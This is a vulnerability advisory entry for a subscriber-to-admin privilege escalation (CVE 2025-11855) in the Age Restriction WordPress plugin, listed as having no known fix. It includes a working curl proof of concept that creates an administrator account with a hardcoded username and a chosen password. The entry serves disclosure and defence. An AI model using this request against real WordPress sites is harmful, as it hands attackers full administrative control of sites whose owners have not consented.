Age Restriction <= 3.0.2 – Subscriber+ Privilege Escalation | CVE 2025-11855 | Plugin Vulnerabilities

Description

The plugin does not have authorisation in the age_restrictionRemoteSupportRequest function, allowing any authenticated users, such as subscriber to create an admin user with a hardcoded username and arbitrary password.

Proof of Concept

```
curl -i -X POST "https://example.com/wp-admin/admin-ajax.php" \
  -d "action=age_restrictionRemoteSupportRequest" \
  -d "sub_actions=access_details" \
  --data-urlencode "params=age_restriction-create_wp_credential=yes&age_restriction-password=<NewPassword>"
```

You can then log in as admin with the user `aateam_support` and the password set above.

Affects Plugins

age-restriction

No known fix

References

CVE

Classification

Type

PRIVESC

OWASP top 10

A2: Broken Authentication and Session Management

CWE

CVSS

Miscellaneous

Original Researcher

Khaled Alenazi (Nxploited)

Submitter

Khaled Alenazi (Nxploited)

Verified

Yes

WPVDB ID

1a16440e-817f-4ec2-9c70-261f6b63fb8a

Timeline

Publicly Published

2025-10-21 (about 2 months ago)

Added

2025-10-21 (about 2 months ago)

Last Updated

2025-10-21 (about 2 months ago)

Other

Published

Title

Published

2024-10-25

Title

Exam Matrix <= 1.5 - Unauthenticated Privilege Escalation

Published

2023-09-04

Title

All in One B2B for WooCommerce <= 1.0.3 - Unauthenticated Privilege Escalation

Published

2025-07-11

Title

The E-Commerce ERP <= 2.1.1.3 - Unauthenticated Privilege Escalation

Published

2025-08-25

Title

Event List < 2.0.5 - Authenticated (Subscriber+) Privilege Escalation

Published

2025-06-09

Title

MapSVG < 8.6.13 - Contributor+ Privilege Esclation